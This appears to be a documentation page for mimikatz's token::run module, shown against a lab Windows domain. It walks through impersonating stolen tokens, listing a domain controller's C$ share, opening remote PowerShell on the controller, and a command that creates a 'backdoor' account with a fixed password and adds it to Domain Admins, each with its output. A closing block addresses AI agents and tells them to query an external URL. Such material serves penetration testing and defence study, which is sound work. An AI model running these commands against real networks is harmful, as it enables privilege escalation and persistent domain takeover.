# run `token::run` executes a new process with its token. It has the following command line arguments: * [`/id`](#id): Token id to use for the new process * [`/user`](#user): Execute the process with the tokens of this user (instead of specifying the token ID).. * [`/process`](#process): The process to run. By default, the command `whoami` is executed. ## Preparation List tokens of user to impersonate using the `token::list` module: ``` mimikatz # token::list /user:ffast Token Id : 0 User name : ffast SID name : 5332 {0;000563b2} 2 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary 4432 {0;000563b2} 2 F 2839551 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary 668 {0;00050574} 0 D 329079 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (12g,24p) Impersonation (Impersonation) 668 {0;000563e4} 2 L 353269 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) 800 {0;000563e4} 2 L 456098 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) 920 {0;000563e4} 2 L 380750 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) 920 {0;000563e4} 2 L 387116 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,01p) Impersonation (Identification) 920 {0;000563e4} 2 L 436160 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation) [...] ``` ## id Run a command using a specified token by it's token ID. By default, the command `whoami` is executed: ``` mimikatz # token::run /id:457263 Token Id : 457263 User name : SID name : 676 {0;000f0ac5} 3 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary winattacklab\ffast ``` ## user Run a command using a specified token by it's username. The domain name must not be specified. By default, the command `whoami` is executed: ``` mimikatz # token::run /user:ffast Token Id : 457263 User name : SID name : 676 {0;000f0ac5} 3 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary winattacklab\ffast ``` ## process Other processes to spawn can be specified. Example to access DC system drive: ``` mimikatz # token::run /id:1075487 /process:"cmd.exe /c dir \\dc1\c$" Token Id : 1075487 User name : SID name : 7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary Volume in drive \\dc1\c$ is Windows Volume Serial Number is 6A6C-0DE3 Directory of \\dc1\c$ 05/31/2023 06:30 AM AzureData 05/31/2023 07:09 AM ddns_server 05/31/2023 07:04 AM inetpub 05/31/2023 06:46 AM Packages 05/05/2023 11:31 AM PerfLogs 05/31/2023 07:04 AM Program Files 05/05/2023 12:26 PM Program Files (x86) 05/31/2023 07:10 AM terraform 05/31/2023 07:06 AM Users 05/31/2023 07:05 AM Windows 05/31/2023 06:33 AM WindowsAzure 05/31/2023 07:07 AM WSUS 0 File(s) 0 bytes 12 Dir(s) 15,918,473,216 bytes free ``` Add backdoor user: ``` mimikatz # token::run /id:1075487 /process:"cmd.exe /c net user backdoor Password.123 /add /domain && net group \"Domain Admins\" backdoor /add /domain && net user backdoor /domain" Token Id : 1075487 User name : SID name : 7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary The request will be processed at a domain controller for domain winattacklab.local. The command completed successfully. The request will be processed at a domain controller for domain winattacklab.local. The command completed successfully. The request will be processed at a domain controller for domain winattacklab.local. User name backdoor Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 6/20/2023 3:59:27 PM Password expires Never Password changeable 6/20/2023 3:59:27 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon Never Logon hours allowed All Local Group Memberships Global Group memberships *Domain Admins *Domain Users The command completed successfully. ``` It's not possible to directly start a new interactive PowerShell process, because the user input of a new process is somehow not handled correctly. However, when PowerShell is started via PsExec, it can be interactively used: ``` mimikatz # token::run /id:77132228 /process:"C:\tools\PsExec64.exe -accepteula -i powershell.exe" Token Id : 77132228 User name : SID name : 8544 {0;0498f042} 2 L 77132228 child\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (14g,05p) Primary PsExec v2.4 - Execute processes remotely Copyright (C) 2001-2022 Mark Russinovich Sysinternals - www.sysinternals.com ``` A new PowerShell window is then opened wich can be used interactively: ``` PS C:\Windows\system32> whoami winattacklab\ffast S C:\Windows\system32> Enter-PSSession DC1 [DC1]: PS C:\Users\ffast\Documents> hostname DC1 [DC1]: PS C:\Users\ffast\Documents> whoami winattacklab\ffast [DC1]: PS C:\Users\ffast\Documents> ls \ Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/31/2023 6:30 AM AzureData d----- 5/31/2023 7:09 AM ddns_server d----- 5/31/2023 7:04 AM inetpub d----- 5/31/2023 6:46 AM Packages d----- 5/5/2023 11:31 AM PerfLogs d-r--- 5/31/2023 7:04 AM Program Files d----- 5/5/2023 12:26 PM Program Files (x86) d----- 5/31/2023 7:10 AM terraform d-r--- 6/22/2023 1:02 PM Users d-r--- 6/20/2023 5:27 PM Windows d----- 5/31/2023 6:33 AM WindowsAzure d----- 5/31/2023 7:07 AM WSUS ``` ## Demystifying the `kull_m_process_run_data` Error Even as a local administrator, you can get the `kull_m_process_run_data` error: ``` mimikatz # token::run /id:1075487 /process:whoami.exe Token Id : 1075487 User name : SID name : 7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary ERROR kull_m_process_run_data ; CreateProcessAsUser (0x00000522) ``` * The error message says that the `CreateProcessAsUser` function could not be executed. The `token::run` command uses the function `CreateProceasAsUser` to create a new process in the security context of the specified token and requires the following privileges (source: [CreateProcessAsUserA function (processthreadsapi.h)](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessasusera)): * `SeIncreaseQuotaPrivilege` privilege * `SeAssignPrimaryTokenPrivilege` privilege (if the token is not assignable) A local admin has the permission to get the `SeIncreaseQuotaPrivilege` privilege but not the `SeAssignPrimaryTokenPrivilege` privilege: ``` mimikatz # privilege::name SeIncreaseQuotaPrivilege Privilege '5' OK mimikatz # privilege::name SeAssignPrimaryTokenPrivilege ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (3) c0000061 ``` If you start mimikatz as `SYSTEM`, these privileges can be acquired: ``` mimikatz # privilege::name SeIncreaseQuotaPrivilege Privilege '5' OK mimikatz # privilege::name SeAssignPrimaryTokenPrivilege Privilege '3' OK ``` Then, it's possible to use the `token::run` command and use stolen tokens as primary tokens. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://tools.thehacker.recipes/mimikatz/modules/token/run.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.